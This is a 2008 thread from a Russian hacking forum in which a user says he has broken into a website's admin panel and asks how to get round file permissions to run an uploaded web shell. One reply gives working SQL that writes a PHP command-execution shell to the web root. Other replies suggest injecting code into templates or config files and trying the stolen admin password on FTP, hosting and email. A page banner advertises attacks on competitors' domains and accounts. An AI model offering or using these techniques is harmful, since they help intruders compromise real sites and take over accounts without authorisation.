как обойти chmod

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
как обойти chmod

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

как обойти chmod

25.11.2008, 08:48

fominsa

Новичок

Регистрация: 12.11.2008

Сообщений: 5

С нами: 9207205

Репутация: 20

как обойти chmod

народ помогите с таким вопросом! есть сайт его я взламал попал в админку в админке есть возможность добавлять файлы но! зараза выставляет chmod 0666 и когда я обращаюсь напрямую к файлу меня перекидывает на сайт хостера (агава) и пишет что права должны быть 0755 что делать вот вроде победа близка

залить шелл пытался но из за этих прав все к чертям. в папку данную можно залить что угодно хоть .htaccess ( им я чтонибудь могу сделать?)

кстати тамже можно выполнить любой sql код там есть хрень для ввода sql команд

𝕏 Twitter Reddit Telegram Копировать ссылку

25.11.2008, 09:23

heks

Постоянный

Регистрация: 24.08.2007

Сообщений: 474

С нами: 9849598

Репутация: 126

ни че тут не сделаешь пробуй в шаблоны код вставить или еще куда либо

25.11.2008, 09:27

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

С нами: 9846041

Репутация: 1177

А может дело в хостере, а?

25.11.2008, 10:14

_Pantera_

Участник форума

Регистрация: 06.10.2006

Сообщений: 226

С нами: 10313606

Репутация: 1327

CREATE TABLE `news` (`mess` TEXT NOT NULL) ENGINE = MYISAM ;
INSERT INTO `news` (`mess`) VALUES ('<?php system($_GET[cmd]); ?>');
SELECT `mess` FROM `news` INTO OUTFILE "/var/www/html/shell.php";

25.11.2008, 11:41

Тр⚡️ха

Reservists Of Antichat - Level 6

Регистрация: 14.11.2007

Сообщений: 178

С нами: 9731846

Репутация: 622

Цитата:

Сообщение от _Pantera_

CREATE TABLE `news` (`mess` TEXT NOT NULL) ENGINE = MYISAM ;
INSERT INTO `news` (`mess`) VALUES ('<?php system($_GET[cmd]); ?>');
SELECT `mess` FROM `news` INTO OUTFILE "/var/www/html/shell.php";

после такова запроса у shell.php права будут -rw-rw-rw-
мало вероятно что он запустится, и агава вроде не даёт привилегия File для mysql.

ТС ищи скрипты которые можно редактировать, для начала попробуй конфиг

25.11.2008, 16:36

Neoveneficus

Reservists Of Antichat - Level 6

Регистрация: 10.04.2008

Сообщений: 299

С нами: 9518726

Репутация: 405

php скрипту не нужны права на запуск. это же не программа... или я не прав?

25.11.2008, 17:01

[Raz0r]

Members of Antichat - Level 5

Регистрация: 25.02.2007

Сообщений: 495

С нами: 10109126

Репутация: 1980

Цитата:

php скрипту не нужны права на запуск.

все верно

Последний раз редактировалось [Raz0r]; 26.11.2008 в 00:48.. Причина: ступил...

27.11.2008, 13:07

Тр⚡️ха

Reservists Of Antichat - Level 6

Регистрация: 14.11.2007

Сообщений: 178

С нами: 9731846

Репутация: 622

Цитата:

Сообщение от [Raz0r]

все верно

лазил на одном серваке, вот там полный пэ, так и не понял почему но скрипт с 0777 не запускался а вот с 0755 запускался как миленький

27.11.2008, 17:55

~~otmorozok428~~

Banned

Регистрация: 19.10.2007

Сообщений: 152

С нами: 9769519

Репутация: 415

Цитата:

Сообщение от chekist

Ну да, сейчас, так частенько делают: залить скрипт к соседнему юзеру в папку с правами 777 можешь, а выполнить нет. Я писал про такую хрень недавно

http://forum.antichat.ru/thread90408.html

#10

25.11.2008, 21:55

geforse

Постоянный

Регистрация: 02.03.2008

Сообщений: 893

С нами: 9574565

Репутация: 712

ТС попробуй, можт пароль от админки к ftp/хостингу/мылу подходит = )

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Как обойти прова?	.Striker	Безопасность и Анонимность	21	05.06.2008 14:21
Delphi задай вопрос [F.A.Q] [антибоян]...	Jes	С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby	2	05.04.2008 23:26
PhpBB. Требует пароль и логин для входа в админку. Как это обойти ?	CraF	Уязвимости CMS / форумов	4	14.08.2005 11:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules